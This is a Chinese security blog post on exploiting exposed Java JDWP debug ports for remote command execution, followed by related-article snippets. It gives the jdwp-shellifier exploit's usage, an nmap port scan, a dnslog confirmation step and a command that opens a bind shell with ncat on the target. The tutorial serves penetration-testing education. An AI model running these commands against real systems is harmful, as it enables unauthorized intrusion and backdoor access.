java JDWP调试接口任意命令执行漏洞

最新推荐文章于 2024-02-06 15:00:48 发布
最新推荐文章于 2024-02-06 15:00:48 发布
阅读量5.3k 收藏 1
点赞数
文章标签: java linux 安全 docker android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tangshuangsss/article/details/121987666
版权

293ea7bcc824d27fd1cf2f40156e83f9.gif

点击"仙网攻城狮”关注我们哦~

不当想研发的渗透人不是好运维fa2636fba406232c3941429321a3b273.png

让我们每天进步一点点

简介

JDWP(Java DEbugger Wire Protocol):即Java调试线协议,是一个为Java调试而设计的通讯交互协议,它定义了调试器和被调试程序之间传递的信息的格式。说白了就是JVM或者类JVM的虚拟机都支持一种协议,通过该协议,Debugger 端可以和 target VM 通信,可以获取目标 VM的包括类、对象、线程等信息,该漏洞可以被黑帽子直接利用进行非法活动。

22ed9b9bdd4799dec4124df38639ddb3.png实战

下载exp:

https://github.com/IOActive/jdwp-shellifier

使用方法:

python jdwp-shellifier.py -t 目标主机ip -p jdwp运行端口 --cmd "Your Command"

使用nmap扫描目标nmap -sV -p 1-65535 目标ip  发现端口2424使用java Debug

46b684c37891531541fbc2953cb8cd6f.png

开启一个dnslog来确认命令执行

211c0935328673fabae5fc79e8afbd4c.png

使用exp进行命令注入

ac3467d759046b434f7257639e448c98.png

查看dnslog 发现命令已经执行成功

6f52b7f0530036ddf9ac7873086502ab.png

当然也可以直接开启一个后门使用nc进行连接

python jdwp-shellifier.py -t 127.0.0.1 -p 8000 --cmd "ncat -lvvp 1234 -e /bin/bash"

这个漏洞经常出现在云环境部署后开发人员粗心大意没有关闭调试接口或者没有配置访问控制的情况下。漏洞原理啥的就不啰嗦了。

往期内容

灭世之Apache Log4j2 远程代码执行漏洞

CFT学习资源与工具上新

工具篇-BurpSutie Pro 2021.10.1最新版本

327f942b1e2cead93299d412c2a78797.gif

37590f685828786045410d4dea972024.gif

更多资讯长按二维码 关注我们

觉得不错点个“赞”呗c4e3cbbbed909e5c116cd9a61e15ab80.png      

TaibaiXX1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
浅析JDWP远程命令执行漏洞 [ Mi1k7ea ]1
08-03
2022/3/2 下午8:30浅析JDWP远程命令漏洞 [ Mi1k7ea ]https://www.mi1k7ea.com/2021/08/06/浅析JDW
IDEA远程调试JDWP调试端口RCE漏洞
道阻且长,行则将至。
12-10 558
在对一些 Java CVE 漏洞调试分析过程中,本地 IDEA 搭建漏洞环境的话既麻烦又不安全,这个时候如果能直接在虚拟机运行 Vulhub 提供的 Docker 靶场并使用物理机 IDEA 对其进行远程调试,那么这项工作就显得安全便捷了。本文来学习下如何通过 IDEA 远程调试远程 Docker 服务的靶场环境,同时学习此类调试环境衍生的服务器安全风险——JDWP调试接口对外开放导致RCE漏洞
JDWP 协议及实现
最新发布
liudong200618的博客
02-06 991
这里首先要说明一下 debugger 和 target vm。Target vm 中运行着我们希望要调试的程序,它与一般运行的 Java 虚拟机没有什么区别,只是在启动时加载了 Agent JDWP 从而具备了调试功能。而 debugger 就是我们熟知的调试器,它向运行中的 target vm 发送命令来获取 target vm 运行时的状态和控制 Java 程序的执行。Debugger 和 target vm 分别在各自的进程中运行,他们之间的通信协议就是 JDWP
jdwp命令执行
公众号shadow sock7
10-18 8146
利用脚本: https://github.com/IOActive/jdwp-shellifier 命令成功执行 用wireshark抓包发现
使用JDWP远程debug
skk_joker的博客
07-30 849
JDWP JDWPJava Debug Wire Protocol 的缩写,它 定义了调试器(debugger)和被调试Java虚拟机(target vm)之间的通信协议。 SpringBoot+debug 1、springboot框架搭建 打开idea选择Spring Initializr 2、选择Web的启动包 3、建一个测试类:比较简单的一个for循环 @RestControlle...
关闭JDWP端口,或者JDWP端口不对公网开放
weixin_42328925的博客
01-03 4787
查询出的端口是8000,我只需要把8000端口关闭就可以了 ubuntu:查看端口使用情况,使用netstat命令 查看所有服务端口: netstat -ap 查看指定端口,可以结合命令grep命令: netstat -ap | grep 8000 若要关闭使用这个端口的程序,使用kill -9 + 端口对应的PID号 kill -9 PID号 ...
常见的端口渗透笔录
里卡多·伊泽克森·多斯·桑托斯·达的博客
03-24 1167
常见的端口渗透笔录 这个不是我写的,朋友圈看到的
远程代码执行漏洞的利用与防御
qq_61714717的博客
12-14 1380
RCE漏洞
常见端口对应服务及其漏洞
qq_67473072的博客
07-14 1060
常见端口对应服务及其漏洞
Java远程调试(Remote Debug)可导致远程命令执行漏洞
weixin_33907511的博客
01-16 1836
2019独角兽企业重金招聘Python工程师标准>>> ...
JDWP漏洞验证
anan的博客
04-06 2982
前言 JDWPJava Debug Wire Protocol 的缩写,它定义了调试器(debugger)和被调试Java 虚拟机(target vm)之间的通信协议。 JDWP就是JAVA的一个调试协议。本质上我们通过IDEA或者eclipse通过断点的方式调试JAVA应用时,使用的就是JDWP。因为是调试协议,不可能带有认证信息,那么对于一个开启了调试端口JAVA应用,我们就可能利用JDWP进行调试,最终执行命令。在什么时候会使用到JDWP这种协议呢?比如你在线上跑了一个应用,但是这个问题只
JDWP 远程命令执行 检查工具
04-26
JDWP 远程命令执行检查工具,JDWPJava DEbugger Wire Protocol):即Java调试线协议,是一个为Java调试而设计的通讯交互协议,它定义了调试器和被调试程序之间传递的信息的格式。说白了就是JVM或者类JVM的虚拟机都...
深入Java调试体系,第3部分:JDWP协议及实现
02-03
JDWP协议介绍协议分析Packet的结构JDWP传输接口JavaDebugWireProtocolTransportInterface)JDWP命令实现机制JDWP的事件处理机制结语参考资料JPDA(JavaPlatformDebuggerArchitecture)是Java平台调试体系结构的...
深入Java调试体系(JPDA-JDWP)
03-13
JPDA 主要由三个部分组成:Java 虚拟机工具接口(JVMTI),Java 调试线协议(JDWP),以及 Java 调试接口(JDI),本系列将会详细介绍这三个模块的内部细节、通过实例为读者揭开 JPDA 的面纱。
2021-08-09windows开放指定端口以及配置远程断点
baidu_39310713的博客
08-09 420
故事背景 背景:有一个需求,springboot 以jar包部署 配置远程断点的场景。 windows开放指定端口以及配置远程断点故事背景一、配置远程断点二、idea远程调试配置三、开启指定端口1.测试端口是否可以连接2.配置防火墙入站规则 一、配置远程断点 远程调试:5006 jar包地址:D:\ZY_SRM5_DEV_NEW\SRMV7_END\jysrm-6.0.1-SNAPSHOT.jar 项目启动端口:7777 java -Xdebug -Xrunjdwp:transport=dt_socke
java开启远程调试端口
运维@小兵的博客
09-02 1202
Java后面添加如下参数即可 8086为远程调试端口 -Xdebug -Xrunjdwp:transport=dt_socket,suspend=n,server=y,address=8086
attach: handshake failed
热门推荐
一步一个脚印的专栏
08-01 1万+
attach:handshake failed - received >GET / HTTP/1.1JDWP-Handshake 场景 协助技术同学调试了一个关于jdwp端口与http服务端口的问题,刚开始收到服务调用的同学说我们预上线服务有问题直接拒绝服务,查服务log发现一堆Debuggerfailed to attach JDWP-Handshake的信息,查服务配置的确开启了jdw
漏洞复现】JDWP远程命令执行漏洞
weixin_43486390的博客
03-02 5530
0x01 漏洞描述 JPDA(Java Platform Debugger Architecture):即Java平台调试体系架构。Java虚拟机设计的专门的API接口调试和监控虚拟机使用 JPDA按照抽象层次,又分为三层,分别是: JVM TI(Java VM Tool Interface):虚拟机对外暴露的接口,包括debug和profile。 JDI(Java Debug Interface):Java接口,实现了JDWP协议的客户端,调试器可以用来和远程被调试应用通信。 JDWPJava
java - jdwp远程调试线协议的使用
小草飞上天
06-13 1493
JDWPJava Debug Wire Protocol)调试线协议,及通过客户端与远程java服务程序之间的传输协议。
如何关闭jdwp端口
10-12
关闭 jdwp 端口的方法取决于你使用的应用程序服务器或 IDE。一般来说,你需要编辑应用程序服务器或 IDE 的配置文件,将 jdwp 端口的值设置为 0 或注释掉相关配置项。以下是一些常见应用程序服务器和 IDE 的关闭 jdwp 端口的方法: 1. Tomcat:编辑 catalina.sh 或 catalina.bat 文件,在 JAVA_OPTS 变量中添加 -Djava.compiler=NONE -Xnoagent -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=0 即可关闭 jdwp 端口。 2. IntelliJ IDEA:在 Run/Debug Configurations 中找到需要关闭 jdwp 端口的配置项,将 Debugger -> Port 设置为 0 即可。 3. Eclipse:在 Debug Configurations 中找到需要关闭 jdwp 端口的配置项,将 Debugger -> Connection Type 设置为 Standard (Socket Attach) 并将 Port 设置为 0 即可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值